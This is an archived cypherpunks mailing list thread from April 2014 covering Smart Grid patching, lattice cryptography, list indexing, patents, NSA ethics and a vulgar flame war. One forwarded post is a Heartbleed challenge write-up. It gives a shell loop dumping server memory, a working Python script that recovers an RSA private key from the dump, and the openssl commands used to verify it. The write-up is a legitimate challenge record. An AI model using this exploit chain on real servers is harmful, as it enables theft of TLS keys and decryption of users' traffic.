Thu, Apr 10, 2014 at 7:40 PM, wrote: >... > APT in a World of Rising Interdependence > invited address, NSA, 26 March 2014 > http://geer.tinho.net/geer.nsa.26iii14.txt another great read Dan! thanks :) my only comment, for now: """ Five years ago, Kelly Ziegler calculated that patching a fully deployed Smart Grid would take an entire year to complete, largely because of the size of the per-node firmware relative to the available powerline bandwidth. """ this does not take into consideration the "truck roll" option. it's the network operator's worst nightmare; an option of last resort. the majority of smart grid devices i have analyzed contain both optical and higher speed radio interfaces which may be accessed by a technician on site or near by. much more expensive than the slow trickle broadcast, but to claim a critical fix could be deployed only via one method is a bit misleading. p.s. hacking these devices still an undiscovered country! has your local utility given you one yet? best regards, From coderman at gmail.com Sun Apr 13 06:55:06 2014 From: coderman at gmail.com (coderman) Date: Sun, 13 Apr 2014 06:55:06 -0700 Subject: "How I obtained the private key for www.cloudflarechallenge.com" In-Reply-To: <3142883.qliPh6rQWL@lap> References: <3142883.qliPh6rQWL@lap> Message-ID: On Sun, Apr 13, 2014 at 2:16 AM, rysiek wrote: > Hi there, > > https://gist.github.com/epixoip/10570627 ---- I wasn't first to get the key. Nor was I second, third, or even fourth. I'm probably not even the 10th to get it. But I'm happy that I was able to prove to myself that I too could do it. The sleepless adventure began yesterday afternoon, 2014-04-12 15:19:04.827516279 -0700. First, I have to admit I was a skeptic. Like the handful of other dissenters, I had initially believed that it would be highly improbable under normal conditions to obtain the private key through exploiting Heartbleed. So this was my motivation for participating in Cloudflare's challenge. I had extracted a lot of other things with Heartbleed, but I hadn't actually set out to extract private keys. So I wanted to see first-hand if it was possible or not. I started by hastily modifying the hb-test.py that everyone has been using to dump the raw memory contents to a file, rather than print a hexdump. I then left this running in the background for a (very long) while, as I set off to think of an approach. while true; do python hb-raw.py www.cloudflarechallenge.com; done My original thinking was that I could get a large sample of memory, then use some forensic analysis tools to search for keys in the memory dump. This idea went to the wayside, however, as I got sidetracked when I started seeing "BEGIN RSA PRIVATE KEY" strings in the script output. http://bindshell.nl/epixoip/cloudflare_key.png I thought it was too good to be true, but after parsing it out, it was indeed a valid private key, so I submitted it -- unsuccessfully. This turned out to be the work of trolls who were sending private key contents in heartbeat requests to the server, and I fell for the trollbait. I found several more `private keys' in the dump, and I skeptically tested them anyway, just in case. But they were all fake as well. Fucking trolls. But at least I didn't fall for any of the keys that ended in "LOLJK" ;) So, I decided to get back on track and stick to my original plan. After searching through some forensics mailing lists and reading some papers on the topic, my plan was to parse my dump file, looking for the start of a key in ASN.1 format ("\x30\x82"), and then parse out the key from there. While working on this approach, I had a conversation with Brandon Enright (@bmenrigh) on IRC. This conversation left me thinking that my approach won't work, because the chances of the key being in ASN.1 DER format in memory are about as slim as the key being in PEM format in memory. Brandon, however, suggested a much more reasonable approach: (19:25:15) < bmenrigh> But my plan would be to interpret all possible portions of the memory dump as however the P and Q factors get encoded and then just trial divide the N modulus from the SSL cert until you get one that divides (19:26:38) < bmenrigh> you only get up to about 64k of memory on each grab so if you interpret every offset as the start of the dump as whatever a private key looks like it just isn't many trial divisions By this time though, I had already been working on this for several hours, and it was Friday night, so I didn't want to spend any more time on it. However, I gave it some more thought over dinner, and the more I drank, the more I realized it was far more likely that the binary values of p, or q, or both, were in memory as-is. They likely wouldn't be encoded at all, so we can just shift through the memory dump in $keysize chunks, converting them to bignums and doing the trial divide as Brandon suggested. This would be really easy to code up and test, so I decided to call it an early night, and rushed home to work on it while the thought (and the liquor) were still fresh in my brain. The version of hb-test.py that I already had running in the background was dumping memory in 16 KiB chunks, not the full 64 KiB, so the plan would be to read the memory dump in 16 KiB chunks, shifting through each chunk in $keysize sections, testing to see if we have a prime that the modulus is divisible by. I sketched out the following psuedocode: while (chunk = fread (file, 16384)) { for (offset = 0; offset < len(chunk)-keysize; offset++) { p = bignum (chunk[offset-1] .. chunk[offset+keysize-1]) if (p is prime and modulus % p == 0) { q = modulus / p; print p, q; } } } After a few hours of testing and debugging, lo and behold, one of the primes is in my dump. Several times, even. From here, it is trivial to get the private key given p/q and the modulus. I ended up with the following script: import sys, base64, gmpy from pyasn1.codec.der import encoder from pyasn1.type.univ import * def main (): n = int (sys.argv[2], 16) keysize = n.bit_length() / 16 with open (sys.argv[1], "rb") as f: chunk = f.read (16384) while chunk: for offset in xrange (0, len (chunk) - keysize): p = long (''.join (["%02x" % ord (chunk[x]) for x in xrange (offset + keysize - 1, offset - 1, -1)]).strip(), 16) if gmpy.is_prime (p) and p != n and n % p == 0: e = 65537 q = n / p phi = (p - 1) * (q - 1) d = gmpy.invert (e, phi) dp = d % (p - 1) dq = d % (q - 1) qinv = gmpy.invert (q, p) seq = Sequence() for x in [0, n, e, d, p, q, dp, dq, qinv]: seq.setComponentByPosition (len (seq), Integer (x)) print "\n\n-----BEGIN RSA PRIVATE KEY-----\n%s-----END RSA PRIVATE KEY-----\n\n" % base64.encodestring(encoder.encode (seq)) sys.exit (0) chunk = f.read (16384) print "private key not found :(" if __name__ == '__main__': main() (I'm sorry if this code offends any python aficionados, but I do not write in python very often.) Putting it all together, epixoip at token:~$ while true; do python hb-raw.py www.cloudflarechallenge.com; done epixoip at token:~$ echo | openssl s_client -connect www.cloudflarechallenge.com:443 -showcerts | openssl x509 > cloudflare.pem depth=4 C = SE, O = AddTrust AB, OU = AddTrust External TTP Network, CN = AddTrust External CA Root verify error:num=19:self signed certificate in certificate chain verify return:0 DONE epixoip at token:~$ openssl x509 -pubkey -noout -in cloudflare.pem > cloudflare_pubkey.pem epixoip at token:~$ python extractkey.py cloudflare.raw $(openssl x509 -in cloudflare.pem -modulus -noout | cut -d'=' -f2) > cloudflare_privkey.pem epixoip at token:~$ echo "epixoip has your key" | openssl sha1 -sign cloudflare_privkey.pem -sha1 >signed_proof.bin epixoip at token:~$ echo "epixoip has your key" | openssl dgst -verify cloudflare_pubkey.pem -signature signed_proof.bin -sha1 Verified OK And just so anyone else can verify it if they wish, epixoip at token:~$ echo "epixoip has your key" | openssl sha1 -sign cloudflare_priv.pem -sha1 | base64 XQT3ZRp1zqK++UUZEWQkib2MX9tiUTN3VEA2G4mj4n86cmc0hTEAS2GO1AgkmoVgshFR/JYxlX74 s+DHPn4PbyAUB4eC+AqS6T+Wc6PR/Jo4XkF9MTsqLviB/jzSt0wl9pld2RbwMNAToE+HGu5vP4PZ wfW6P5E5HTb/lTsONSubJj9FhZWkDNJPn+d0l/8rS4e9AYvQRII8JGfXAa7BOHgT57qw5F03dE8n srtAu04CSpos25DdgZN47yCecMKETxWe3PeiyeMIbj6OyLdjF/+JUDeN85vXTUx0P7AzOqCeHNon 3uBX7CQZgpl30oaqdCFQcdIOhTb2QwdE3FvSzA== So there you have it. I submitted my proof to Cloudflare about 7 hours ago, so I effectively spent a whole day on it. I wasn't the first to get it, probably not even the 10th. And I did need some guidance (thanks Brandon!) But overall, I am pleased. The next step would be to integrate this into hb-test.py, or ideally just re-write the whole damn thing top-to-bottom in C. From coderman at gmail.com Sun Apr 13 06:56:31 2014 From: coderman at gmail.com (coderman) Date: Sun, 13 Apr 2014 06:56:31 -0700 Subject: "How I obtained the private key for www.cloudflarechallenge.com" In-Reply-To: References: <3142883.qliPh6rQWL@lap> Message-ID: On Sun, Apr 13, 2014 at 6:55 AM, coderman wrote: > ... well that formatted horribly. time for coffee... (link to raw is https://gist.githubusercontent.com/epixoip/10570627/raw/570510ed21c5db6301dc377b834760b32b818f73/cloudflare_challenge for you curl'ers...) From coderman at gmail.com Sun Apr 13 07:00:36 2014 From: coderman at gmail.com (coderman) Date: Sun, 13 Apr 2014 07:00:36 -0700 Subject: NTRU Prime implementation Message-ID: reification requested! http://blog.cr.yp.to/20140213-ideal.html """ Here's a concrete suggestion, which I'll call NTRU Prime, for eliminating the structures that I find worrisome in existing ideal-lattice-based encryption systems. This suggestion uses a number field of prime degree, so that the only subfield is Q; and uses an irreducible polynomial xp-x-1 with a very large Galois group, so that the number field is very far from having automorphisms. The best CVP dimension seems to be about half the degree; this is optimal for number fields without many real embeddings. (It's hard to create many real embeddings while keeping coefficients small, and if coefficients are large then there are other problems.) This suggestion also chooses its modulus q so that (Z/q)[x]/(xp-x-1) is a field; this simultaneously avoids (1) NTRU's traditional 2-adic structure and (2) the linear splittings used in most recent papers. """ From coderman at gmail.com Sun Apr 13 07:08:27 2014 From: coderman at gmail.com (coderman) Date: Sun, 13 Apr 2014 07:08:27 -0700 Subject: How come search engines don't crawl the list and I can't find 'robots.txt'? In-Reply-To: <20140413135352.GA2487@sivokote.iziade.m$> References: <20140413135352.GA2487@sivokote.iziade.m$> Message-ID: On Sun, Apr 13, 2014 at 6:53 AM, Georgi Guninski wrote: > AFAICT the list archives don't show in search engines > and in addition don't see /robots.txt. > > How so? back when traffic was handled on the al-qaeda.net domain, indexing by western search engines was considered to be "material support to Al-qaeda"... now they've just forgotten to undo their filters. ;) From coderman at gmail.com Sun Apr 13 07:13:34 2014 From: coderman at gmail.com (coderman) Date: Sun, 13 Apr 2014 07:13:34 -0700 Subject: [cryptome] Re: snowman news In-Reply-To: References: <001501cf52b8$3407a4d0$9c16ee70$@com> Message-ID: On Mon, Apr 7, 2014 at 4:48 PM, John Young wrote: > Great that Snowden is getting another chance to speak for himself, speaking of speaking directly, i hear one fine JYA got to mingle with the leakers? how hard did you press for a mass doc drop, John? i would have donated toward such a bribe... looks like an interesting crowd! (who has .vid transcripts?) best regards, #JustALittleJealous c.f.: http://cryptome.org/greenwald-miranda-young.jpg From jamesdbell9 at yahoo.com Sun Apr 13 10:43:16 2014 From: jamesdbell9 at yahoo.com (jim bell) Date: Sun, 13 Apr 2014 10:43:16 -0700 (PDT) Subject: Fw: Curious Intellectual Property Food-for-thought: "Live-forever Pingers" In-Reply-To: <1397335078.49963.YahooMailNeo@web126204.mail.ne1.yahoo.com> References: <1397335078.49963.YahooMailNeo@web126204.mail.ne1.yahoo.com> Message-ID: <1397410996.48713.YahooMailNeo@web126202.mail.ne1.yahoo.com> [apparently this didn't 'stick' the first time] Some people debate whether 'intellectual property' (such as patents) should exist.  The standard for patenting is said to be:  An invention, to be patentable, should be "new, useful, and unobvious to those skilled in the art".  A month ago, when it became obvious that finding Air Malaysia Flight 370 could be difficult, the 30-day limit of the electronic pingers got me to thinking.  Why?  Instead of pinging for 30 days, why not have them ping increasingly slowly, so that the pinger would last 'forever'.  Considered discretely, let it ping at the normal rate for 1 week, at half the rate for the next week, at quarter the rate for the subsequent rate, etc.   Or, have a continuous equivalent of this, a ping-rate which slows to approximate this rate over time.  This kind of pinger would 'never' run out.    Should this idea be patentable?  Is it new?  I haven't heard of it.   Is it useful?  It is now clear why it would be useful...now!!!   Is it 'un-obvious'?  Well, despite the fact that I just thought of it a month ago, and I had never heard it proposed before, I wonder why it shouldn't be called 'obvious'.  If anything, I think it's amazing that it hasn't been implemented before.  People who work in aeronautics and electronics are smart and imaginative...at least I thought they were...until now? It should also be possible to include in the ping, information  (transmitted by pulse-position information) about the last lat/lon received by the aircraft.           Jim Bell -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 2436 bytes Desc: not available URL: From rysiek at hackerspace.pl Sun Apr 13 02:16:06 2014 From: rysiek at hackerspace.pl (rysiek) Date: Sun, 13 Apr 2014 11:16:06 +0200 Subject: "How I obtained the private key for www.cloudflarechallenge.com" Message-ID: <3142883.qliPh6rQWL@lap> Hi there, https://gist.github.com/epixoip/10570627 -- Pozdr rysiek -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 316 bytes Desc: This is a digitally signed message part. URL: From jya at pipeline.com Sun Apr 13 09:01:02 2014 From: jya at pipeline.com (John Young) Date: Sun, 13 Apr 2014 12:01:02 -0400 Subject: [cryptome] Re: snowman news In-Reply-To: References: <001501cf52b8$3407a4d0$9c16ee70$@com> Message-ID: The Polk Award plaques have concealed cavity transmitters, so our Google glasses indicate. Back-up. we palmed a sliver RFID in GG's wide mouthed molar, another in Miranda's steely butt, Poitras's panoptic camera, Gellman's top-sekret OTR widget, MacAskill's brogue-decrytor (we saw him plant a 0-day craw deep inside James Ball's kisser). Our totally undoctored vids and transcripts are at Amazon, Utah, Four Eyes, RU, CN, BR, all of them on the same transceiving thieving pipe, each with a twinned JPmorgan, Goldman Sachs fiber, so reports ourr splitter at Ross Anderson's lab in Oxbridge-Cheltenham, centroid of the universe's gobbling inadvertencies. The fake one underskinned in Markus Kuhn's vestigal tail. Real one infected at Vatican, eternal cloud of the pipe of pipes. ----- On Mon, Apr 7, 2014 at 4:48 PM, John Young wrote: > Great that Snowden is getting another chance to speak for himself, speaking of speaking directly, i hear one fine JYA got to mingle with the leakers? how hard did you press for a mass doc drop, John? i would have donated toward such a bribe... looks like an interesting crowd! (who has .vid transcripts?) best regards, #JustALittleJealous c.f.: http://cryptome.org/greenwald-miranda-young.jpg From jya at pipeline.com Sun Apr 13 12:32:06 2014 From: jya at pipeline.com (John Young) Date: Sun, 13 Apr 2014 15:32:06 -0400 Subject: [cryptome] Re: snowman news In-Reply-To: References: <001501cf52b8$3407a4d0$9c16ee70$@com> <1921911960.400353.1397407817750.JavaMail.www@wwinf8305> Message-ID: Dear Maligned Ethicist Machet, Your fee for complaining about star *ucking has been transmitted to Hettinga's offshore dark pool of smegma. We appreciate your disclosing this private banking arrangement to encourage others to reap the benefits of advertising online the ancient love scribble scratched on rubber tree trunks, on kindergarten desktops, on unisex toilet stalls and distributed by porous-sheathed onion routers to mind*uck horny espionage pornsters posting and ogling kiddie-selfies for entrapment bonuses. Underarmored in *uck cpunks tees. @20Committee At 01:17 PM 4/13/2014, you wrote: >have not been more disappointed by star *ucking in i dont know when > >hardens my resolve to never align with any mother *ucker > >only align with ethics From hettinga at gmail.com Sun Apr 13 13:47:49 2014 From: hettinga at gmail.com (Robert Hettinga) Date: Sun, 13 Apr 2014 16:47:49 -0400 Subject: [cryptome] snowman news In-Reply-To: References: <001501cf52b8$3407a4d0$9c16ee70$@com> <1921911960.400353.1397407817750.JavaMail.www@wwinf8305> Message-ID: On Apr 13, 2014, at 3:32 PM, John Young wrote: > Hettinga's offshore dark pool of smegma It was ever thus. Cheers, RAH -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 496 bytes Desc: Message signed with OpenPGP using GPGMail URL: From guninski at guninski.com Sun Apr 13 06:53:52 2014 From: guninski at guninski.com (Georgi Guninski) Date: Sun, 13 Apr 2014 16:53:52 +0300 Subject: How come search engines don't crawl the list and I can't find 'robots.txt'? Message-ID: <20140413135352.GA2487@sivokote.iziade.m$> AFAICT the list archives don't show in search engines and in addition don't see /robots.txt. How so? From guninski at guninski.com Sun Apr 13 07:15:21 2014 From: guninski at guninski.com (Georgi Guninski) Date: Sun, 13 Apr 2014 17:15:21 +0300 Subject: "How I obtained the private key for www.cloudflarechallenge.com" In-Reply-To: References: <3142883.qliPh6rQWL@lap> Message-ID: <20140413141521.GB2487@sivokote.iziade.m$> On Sun, Apr 13, 2014 at 06:56:31AM -0700, coderman wrote: > On Sun, Apr 13, 2014 at 6:55 AM, coderman wrote: > > ... > > well that formatted horribly. time for coffee... > (link to raw is > https://gist.githubusercontent.com/epixoip/10570627/raw/570510ed21c5db6301dc377b834760b32b818f73/cloudflare_challenge > for you curl'ers...) AFAICT this won't work if the bitsizes of p and q are not divisible by 8, but this means tricky key generation. From carimachet at gmail.com Sun Apr 13 10:17:06 2014 From: carimachet at gmail.com (Cari Machet) Date: Sun, 13 Apr 2014 17:17:06 +0000 Subject: [cryptome] Re: snowman news In-Reply-To: <1921911960.400353.1397407817750.JavaMail.www@wwinf8305> References: <001501cf52b8$3407a4d0$9c16ee70$@com> <1921911960.400353.1397407817750.JavaMail.www@wwinf8305> Message-ID: have not been more disappointed by star fucking in i dont know when hardens my resolve to never align with any mother fucker only align with ethics On Sun, Apr 13, 2014 at 4:50 PM, wrote: > > Message du 13/04/14 16:14 > > De : "coderman" > > On Mon, Apr 7, 2014 at 4:48 PM, John Young wrote: > > > Great that Snowden is getting another chance to speak for himself, > > > > speaking of speaking directly, i hear one fine JYA got to mingle with > > the leakers? > > > > how hard did you press for a mass doc drop, John? i would have > > donated toward such a bribe... > > > > looks like an interesting crowd! > > (who has .vid transcripts?) > > What about crowdfunding leakers? If we offer enough for them to abandon > their jobs safely, that may help quite a number of them to bring light > against all kinds of abuses. > -- Cari Machet NYC 646-436-7795 carimachet at gmail.com AIM carismachet Syria +963-099 277 3243 Amman +962 077 636 9407 Berlin +49 152 11779219 Reykjavik +354 894 8650 Twitter: @carimachet 7035 690E 5E47 41D4 B0E5 B3D1 AF90 49D6 BE09 2187 Ruh-roh, this is now necessary: This email is intended only for the addressee(s) and may contain confidential information. If you are not the intended recipient, you are hereby notified that any use of this information, dissemination, distribution, or copying of this email without permission is strictly prohibited. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 2145 bytes Desc: not available URL: From guninski at guninski.com Sun Apr 13 07:38:19 2014 From: guninski at guninski.com (Georgi Guninski) Date: Sun, 13 Apr 2014 17:38:19 +0300 Subject: How come search engines don't crawl the list and I can't find 'robots.txt'? In-Reply-To: References: <20140413135352.GA2487@sivokote.iziade.m$> Message-ID: <20140413143819.GC2487@sivokote.iziade.m$> On Sun, Apr 13, 2014 at 07:08:27AM -0700, coderman wrote: > On Sun, Apr 13, 2014 at 6:53 AM, Georgi Guninski wrote: > > AFAICT the list archives don't show in search engines > > and in addition don't see /robots.txt. > > > > How so? > > back when traffic was handled on the al-qaeda.net domain, indexing by > western search engines was considered to be "material support to > Al-qaeda"... > > now they've just forgotten to undo their filters. > > ;) lol... the russian and chinese comrades don't show the list too, might be for technical reasons. does a single search engine crawls the archives and displays the results? From jya at pipeline.com Sun Apr 13 15:06:30 2014 From: jya at pipeline.com (John Young) Date: Sun, 13 Apr 2014 18:06:30 -0400 Subject: [cryptome] snowman news In-Reply-To: References: <001501cf52b8$3407a4d0$9c16ee70$@com> <1921911960.400353.1397407817750.JavaMail.www@wwinf8305> Message-ID: http://smegmamusic.com/site/ Top fans: https://myspace.com/smegmatheoriginal/topfans At 05:29 PM 4/13/2014, Sampo Syreeni wrote: >On 2014-04-13, Robert Hettinga wrote: > >>>Hettinga's offshore dark pool of smegma >> >>It was ever thus. > >...and we are Legion. >-- >Sampo Syreeni, aka decoy - decoy at iki.fi, http://decoy.iki.fi/front >+358-40-3255353, 025E D175 ABE5 027C 9494 EEB0 E090 8BA9 0509 85C2 From tpb-crypto at laposte.net Sun Apr 13 09:50:17 2014 From: tpb-crypto at laposte.net (tpb-crypto at laposte.net) Date: Sun, 13 Apr 2014 18:50:17 +0200 Subject: [cryptome] Re: snowman news In-Reply-To: References: <001501cf52b8$3407a4d0$9c16ee70$@com> Message-ID: <1921911960.400353.1397407817750.JavaMail.www@wwinf8305> > Message du 13/04/14 16:14 > De : "coderman" > On Mon, Apr 7, 2014 at 4:48 PM, John Young wrote: > > Great that Snowden is getting another chance to speak for himself, > > speaking of speaking directly, i hear one fine JYA got to mingle with > the leakers? > > how hard did you press for a mass doc drop, John? i would have > donated toward such a bribe... > > looks like an interesting crowd! > (who has .vid transcripts?) What about crowdfunding leakers? If we offer enough for them to abandon their jobs safely, that may help quite a number of them to bring light against all kinds of abuses. From guninski at guninski.com Sun Apr 13 09:23:52 2014 From: guninski at guninski.com (Georgi Guninski) Date: Sun, 13 Apr 2014 19:23:52 +0300 Subject: [tor-talk] [cryptography] The Heartbleed Bug is a serious vulnerability in OpenSSL In-Reply-To: References: <149518711.83101.1397221629681.JavaMail.www@wwinf8224> <20140411133240.GA16269@sivokote.iziade.m$> <1409607.uUXFrpi0Wi@lap> Message-ID: <20140413162352.GD2487@sivokote.iziade.m$> On Fri, Apr 11, 2014 at 07:02:53PM -0400, grarpamp wrote: > On Fri, Apr 11, 2014 at 10:43 AM, rysiek wrote: > > Dnia piątek, 11 kwietnia 2014 16:32:44 Georgi Guninski pisze: > >> Is there a significant rise of revoked certs caused > >> by HB paranoia? > > > > No idea, but we're considering revoking ours. > > As to ocsp/crl revocation, haven't looked (depending on > application, getting the cert swapped out is more important > anyway). > But those of us who pin down certs instead of trusting CA's > have been doing quite a bit of reconfiguring this week > due to upstream certs being swapped out. Well, g00gle have strange cert policy: Issuer: C=US, O=Google Inc, CN=Google Internet Authority G2 Validity Not Before: Apr 2 16:00:48 2014 GMT Not After : Jul 1 00:00:00 2014 GMT The visible ASCII structure in the big cert almost sure comes from the ALT names :( From tpb-crypto at laposte.net Sun Apr 13 10:24:41 2014 From: tpb-crypto at laposte.net (tpb-crypto at laposte.net) Date: Sun, 13 Apr 2014 19:24:41 +0200 Subject: [cryptome] Re: snowman news In-Reply-To: References: <001501cf52b8$3407a4d0$9c16ee70$@com> <1921911960.400353.1397407817750.JavaMail.www@wwinf8305> Message-ID: <655674196.402269.1397409881581.JavaMail.www@wwinf8305> > Message du 13/04/14 19:17 > De : "Cari Machet" > A : tpb-crypto at laposte.net > have not been more disappointed by star fucking in i dont know when > > hardens my resolve to never align with any mother fucker > > only align with ethics > Yes, yes, let the butthurt flow through you. From tpb-crypto at laposte.net Sun Apr 13 10:30:48 2014 From: tpb-crypto at laposte.net (tpb-crypto at laposte.net) Date: Sun, 13 Apr 2014 19:30:48 +0200 Subject: How come search engines don't crawl the list and I can't find 'robots.txt'? In-Reply-To: <20140413143819.GC2487@sivokote.iziade.m$> References: <20140413135352.GA2487@sivokote.iziade.m$> <20140413143819.GC2487@sivokote.iziade.m$> Message-ID: <904877.402644.1397410248594.JavaMail.www@wwinf8305> > Message du 13/04/14 17:07 > De : "Georgi Guninski" > A : "coderman" > Copie à : "cpunks" > Objet : Re: How come search engines don't crawl the list and I can't find 'robots.txt'? > > On Sun, Apr 13, 2014 at 07:08:27AM -0700, coderman wrote: > > On Sun, Apr 13, 2014 at 6:53 AM, Georgi Guninski wrote: > > > AFAICT the list archives don't show in search engines > > > and in addition don't see /robots.txt. > > > > > > How so? > > > > back when traffic was handled on the al-qaeda.net domain, indexing by > > western search engines was considered to be "material support to > > Al-qaeda"... > > > > now they've just forgotten to undo their filters. > > > > ;) > > lol... > > the russian and chinese comrades don't show the > list too, might be for technical reasons. > > does a single search engine crawls > the archives and displays the results? > I have heard about the existence of this mailing list for years ... yet never found it with search engines. I never did a positive effort to find it too, let's be honest. It was kind of "one day I may meet that crowd by chance". One day a few months ago I found a guy that posted in another list I was subscribed and also here. Lo and behold, that's the famed mailing list that cannot be found anywhere where reasonable people would search. You guys are hidden in the deepwebz, Google doesn't index it, you are the bad bad turrists, lol. From carimachet at gmail.com Sun Apr 13 13:27:08 2014 From: carimachet at gmail.com (Cari Machet) Date: Sun, 13 Apr 2014 20:27:08 +0000 Subject: [cryptome] Re: snowman news In-Reply-To: References: <001501cf52b8$3407a4d0$9c16ee70$@com> <1921911960.400353.1397407817750.JavaMail.www@wwinf8305> Message-ID: dear john nice attempt to deflect criticism i read your whatever scramble of words that was as a sort of internalizing of some part of the criticism or something mayb - have a sleep on it and think about that you were criticized out of a work ethic and your ego is just a sheathing On Sun, Apr 13, 2014 at 7:32 PM, John Young wrote: > Dear Maligned Ethicist Machet, > > Your fee for complaining about star *ucking has been transmitted > to Hettinga's offshore dark pool of smegma. > > We appreciate your disclosing this private banking arrangement > to encourage others to reap the benefits of advertising online > the ancient love scribble scratched on rubber tree trunks, on > kindergarten desktops, on unisex toilet stalls and distributed by > porous-sheathed onion routers to mind*uck horny espionage > pornsters posting and ogling kiddie-selfies for entrapment > bonuses. Underarmored in *uck cpunks tees. > > @20Committee > > > > At 01:17 PM 4/13/2014, you wrote: > >> have not been more disappointed by star *ucking in i dont know when >> >> hardens my resolve to never align with any mother *ucker >> >> only align with ethics >> > > > -- Cari Machet NYC 646-436-7795 carimachet at gmail.com AIM carismachet Syria +963-099 277 3243 Amman +962 077 636 9407 Berlin +49 152 11779219 Reykjavik +354 894 8650 Twitter: @carimachet 7035 690E 5E47 41D4 B0E5 B3D1 AF90 49D6 BE09 2187 Ruh-roh, this is now necessary: This email is intended only for the addressee(s) and may contain confidential information. If you are not the intended recipient, you are hereby notified that any use of this information, dissemination, distribution, or copying of this email without permission is strictly prohibited. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 2543 bytes Desc: not available URL: From juan.g71 at gmail.com Sun Apr 13 13:32:18 2014 From: juan.g71 at gmail.com (Linux User) Date: Sun, 13 Apr 2014 20:32:18 +0000 Subject: NSA good guys In-Reply-To: References: <534691BD.1060904@cathalgarvey.me> Message-ID: <534b1e10.c647ec0a.276f.ffff8735@mx.google.com> On Sun, 13 Apr 2014 01:28:14 +0200 Lodewijk andré de la porte wrote: > > So. Are the NSA guys good guys? Well. They're the enemy of the > people, as they invade their privacy and therewith their safety. If > you can be blackmailed, studied, influenced, etc. you are weak and > vulnerable. Preaching to the choir, I guess. Well, I get the impression that some of the voices of this choir still need some preaching directed at them =P I noticed something interesting in digital 'security' circles. People who deal with 'security' are, at first sight, technical people and are concerned with issues such as factoring integers, permutations, routing protocols, etc. etc. etc. However, all their technical expertise exists to achieve some political goals. And when you look at the political beliefs of these people, you see that they suck big time. As engineers they may be competent, but there's a step above engineering, and there, they fail. > So I cannot call them > good guys by a very long shot. > > Are the NSA guys bad guys? Well, they do anything to protect their > nation from whatever attack could happen (bad for non-US; me). They > steal secrets for their government (bad for non-US; me). They assist > foreign secret agencies in subverting or avoiding legal restrictions > put in place to protect citizens as (real/wise/elected) politicians > see fit. (very bad for non-US; me) > > Uh. Yeah. I guess they're the bad guys. I usually feel like they are > soldiers on a certain mission, and so no blame comes to them. But I > feel more strongly that the organization is build to produce > law-breaking, privacy-destroying, unethical, unfriendly, aggressive, > anticompetative, distracting and confusing and ultimately just *mean* > practices. > > So yes: the NSA is *EVIL* to the maximum realistic extend. > > The NSA's people enjoy a margin of appreciation. They're doing a job. > They have their reasons. But I do believe most of them are keenly > aware of the extremely large quantity of thoroughly unethical things > their organization is doing, and must be considered at least > partially responsible. From tpb-crypto at laposte.net Sun Apr 13 11:38:53 2014 From: tpb-crypto at laposte.net (tpb-crypto at laposte.net) Date: Sun, 13 Apr 2014 20:38:53 +0200 Subject: Fw: Curious Intellectual Property Food-for-thought: "Live-forever Pingers" In-Reply-To: <1397410996.48713.YahooMailNeo@web126202.mail.ne1.yahoo.com> References: <1397335078.49963.YahooMailNeo@web126204.mail.ne1.yahoo.com> <1397410996.48713.YahooMailNeo@web126202.mail.ne1.yahoo.com> Message-ID: <571107064.411026.1397414332991.JavaMail.www@wwinf8223> > Message du 13/04/14 20:12 > De : "jim bell" > [apparently this didn't 'stick' the first time] > Some people debate whether 'intellectual property' (such as patents) should exist.  The standard for patenting is said to be:  An invention, to be patentable, should be "new, useful, and unobvious to those skilled in the art".  A month ago, when it became obvious that finding Air Malaysia Flight 370 could be difficult, the 30-day limit of the electronic pingers got me to thinking.  Why?  Instead of pinging for 30 days, why not have them ping increasingly slowly, so that the pinger would last 'forever'.  Considered discretely, let it ping at the normal rate for 1 week, at half the rate for the next week, at quarter the rate for the subsequent rate, etc.   Or, have a continuous equivalent of this, a ping-rate which slows to approximate this rate over time.  This kind of pinger would 'never' run out. >    Should this idea be patentable?  Is it new?  I haven't heard of it.   Is it useful?  It is now clear why it would be useful...now!!!   Is it 'un-obvious'?  Well, despite the fact that I just thought of it a month ago, and I had never heard it proposed before, I wonder why it shouldn't be called 'obvious'.  If anything, I think it's amazing that it hasn't been implemented before.  People who work in aeronautics and electronics are smart and imaginative...at least I thought they were...until now? > It should also be possible to include in the ping, information  (transmitted by pulse-position information) about the last lat/lon received by the aircraft.   It is not that your idea didn't "stick" but we have a different problem today than two centuries ago when patents were invented. Patents were invented when people were very ignorant and simple things like boiling cucumbers inside a tightly sealed glass was an innovation that changed the world. Basically anything at that time was something simple yet important enough to warrant a patent. Until the beginning of the 20th century. Now as you pointed out, it is not a matter of creating something nobody knows about. All problems are solvable, it is just a matter of someone putting their hands into it. Big things that would be patentable today, which are not obvious to anyone would be things like Star Wars hovering vehicles, light sabers, etc. One patentable thing is from a guy that made a new kind of cellphone antenna that tracks the devices and sends individual beams to each device using less power and being much faster, you may have heard about it. That's something which is not easy and cannot be easily done with current technology. How many times in a year do you hear about such inventions? But like in ancient times, such wild ideas come out only every once in a while. That wouldn't keep the patent offices, lawyers, attorneys, engineers and all those that orbit around it occupied and pockets filled. It looks like we ought to find other jobs for such people, otherwise they will fight tooth and nail to continue having every insignificant little invention patentable. From juan.g71 at gmail.com Sun Apr 13 13:41:33 2014 From: juan.g71 at gmail.com (Linux User) Date: Sun, 13 Apr 2014 20:41:33 +0000 Subject: How come search engines don't crawl the list and I can't find 'robots.txt'? In-Reply-To: References: <20140413135352.GA2487@sivokote.iziade.m$> Message-ID: <534b203b.4771ec0a.5517.6908@mx.google.com> On Sun, 13 Apr 2014 07:08:27 -0700 coderman wrote: > On Sun, Apr 13, 2014 at 6:53 AM, Georgi Guninski > wrote: > > AFAICT the list archives don't show in search engines > > and in addition don't see /robots.txt. > > > > How so? > > back when traffic was handled on the al-qaeda.net domain, indexing by > western search engines was considered to be "material support to > Al-qaeda"... > > now they've just forgotten to undo their filters. > > ;) https://www.google.com/search?q=test+site%3Acpunks.org%2Fpipermail%2Fcypherpunks%2F the archives are indeed indexed? From dan at geer.org Sun Apr 13 18:46:32 2014 From: dan at geer.org (dan at geer.org) Date: Sun, 13 Apr 2014 21:46:32 -0400 Subject: a speech In-Reply-To: Your message of "Sun, 13 Apr 2014 06:44:56 PDT." Message-ID: <20140414014632.6BA012280D8@palinka.tinho.net> Thanks for the note and the compliment. I took Kelly Ziegler at her word (*) given that her role as an executive at NERC (Northamerican Electric Reliability Corporation). --dan (*) 